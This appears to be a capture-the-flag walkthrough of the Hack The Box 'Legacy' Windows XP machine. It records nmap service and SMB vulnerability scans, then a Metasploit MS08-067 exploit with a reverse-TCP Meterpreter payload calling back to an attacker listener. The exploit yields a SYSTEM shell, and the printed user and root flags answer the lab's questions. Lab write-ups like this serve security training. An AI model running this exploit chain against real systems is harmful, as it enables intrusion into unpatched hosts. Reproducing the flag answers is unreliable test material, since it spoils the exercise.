Target IP: 10.129.227.181
Run a quick nmap scan
└─$ nmap -sC -sV -Pn -v 10.129.227.181
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-11 23:57 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 23:57
Completed NSE at 23:57, 0.00s elapsed
Initiating NSE at 23:57
Completed NSE at 23:57, 0.00s elapsed
Initiating NSE at 23:57
Completed NSE at 23:57, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 23:57
Completed Parallel DNS resolution of 1 host. at 23:57, 0.00s elapsed
Initiating SYN Stealth Scan at 23:57
Scanning 10.129.227.181 [1000 ports]
Discovered open port 135/tcp on 10.129.227.181
Discovered open port 445/tcp on 10.129.227.181
Discovered open port 139/tcp on 10.129.227.181
Completed SYN Stealth Scan at 23:57, 3.13s elapsed (1000 total ports)
Initiating Service scan at 23:57
Scanning 3 services on 10.129.227.181
Completed Service scan at 23:57, 6.52s elapsed (3 services on 1 host)
NSE: Script scanning 10.129.227.181.
Initiating NSE at 23:57
Completed NSE at 23:57, 10.61s elapsed
Initiating NSE at 23:57
Completed NSE at 23:57, 0.00s elapsed
Initiating NSE at 23:57
Completed NSE at 23:57, 0.01s elapsed
Nmap scan report for 10.129.227.181
Host is up (0.13s latency).
Not shown: 982 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
254/tcp filtered unknown
406/tcp filtered imsp
445/tcp open microsoft-ds Windows XP microsoft-ds
1057/tcp filtered startron
1311/tcp filtered rxmon
1533/tcp filtered virtual-places
1864/tcp filtered paradym-31
3322/tcp filtered active-net
5903/tcp filtered vnc-3
6101/tcp filtered backupexec
7741/tcp filtered scriptview
8443/tcp filtered https-alt
9099/tcp filtered unknown
12345/tcp filtered netbus
16012/tcp filtered unknown
49167/tcp filtered unknown
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2024-10-17T08:54:58+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
| nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:4b:5a (VMware)
| Names:
| LEGACY<00> Flags: <unique><active>
| HTB<00> Flags: <group><active>
| LEGACY<20> Flags: <unique><active>
| HTB<1e> Flags: <group><active>
| HTB<1d> Flags: <unique><active>
|_ \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
|_clock-skew: mean: 5d00h27m35s, deviation: 2h07m16s, median: 4d22h57m35s
NSE: Script Post-scanning.
Initiating NSE at 23:57
Completed NSE at 23:57, 0.00s elapsed
Initiating NSE at 23:57
Completed NSE at 23:57, 0.00s elapsed
Initiating NSE at 23:57
Completed NSE at 23:57, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.72 seconds
Raw packets sent: 1119 (49.236KB) | Rcvd: 985 (39.412KB)
Give nmap the following option to scan SMB for vulnerabilities: --script=smb-vuln*.
└─$ nmap --script=smb-vuln* 10.129.227.181
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-12 00:02 EDT
Nmap scan report for 10.129.227.181
Host is up (0.12s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
Nmap done: 1 IP address (1 host up) scanned in 9.27 seconds
How many TCP ports are open on Legacy? 3
What is the 2008 CVE ID for a vulnerability in SMB that allows for remote code execution? CVE-2008-4250
What is the name of the Metasploit module that exploits CVE-2008-4250?
┌──(kali㉿kali)-[~/Tools]
└─$ msfconsole -q
msf6 > search CVE-2008-4250
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms08_067_netapi 2008-10-28 Enter use 0 to use the Metasploit moudle
Set options, especially the RHOSTS and LHOST, then run the exploit
msf6 exploit(windows/smb/ms08_067_netapi) > options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/b
asics/using-metasploit.html
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.160 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/ms08_067_netapi) > set rhosts 10.129.227.181
rhosts => 10.129.227.181
msf6 exploit(windows/smb/ms08_067_netapi) > set lhost 10.10.14.8
lhost => 10.10.14.8
Submit the flag located on the john user's desktop.
C:\Documents and Settings\john\Desktop>type user.txt
type user.txt
e69af0e4f443de7e36876fda4ec7644f
C:\Documents and Settings\john\Desktop>ipconfig /all
ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : legacy
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : .htb
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : .htb
Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter
Physical Address. . . . . . . . . : 00-50-56-B9-4B-5A
Dhcp Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IP Address. . . . . . . . . . . . : 10.129.227.181
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.129.0.1
DHCP Server . . . . . . . . . . . : 10.129.0.1
DNS Servers . . . . . . . . . . . : 1.1.1.1
8.8.8.8
Lease Obtained. . . . . . . . . . : ������, 17 ��������� 2024 8:53:11 ��
Lease Expires . . . . . . . . . . : ������, 17 ��������� 2024 9:53:11 ��
When exploiting MS08-067, what user does execution run as?
Background channel 1? [y/N] y
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEMSubmit the flag located on the administrator's desktop.
C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
993442d258b0e0ec917cae9e695d5713
C:\Documents and Settings\Administrator\Desktop>ipconfig /all
ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : legacy
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : .htb
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : .htb
Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter
Physical Address. . . . . . . . . : 00-50-56-B9-4B-5A
Dhcp Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IP Address. . . . . . . . . . . . : 10.129.227.181
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.129.0.1
DHCP Server . . . . . . . . . . . : 10.129.0.1
DNS Servers . . . . . . . . . . . : 1.1.1.1
8.8.8.8
Lease Obtained. . . . . . . . . . : ������, 17 ��������� 2024 9:23:11 ��
Lease Expires . . . . . . . . . . : ������, 17 ��������� 2024 10:23:11 ��
In addition to MS08-067, Legacy's SMB service is also vulnerable to another remote code execution vulnerability with a CVE ID from 2017. What is that ID? CVE-2017-0143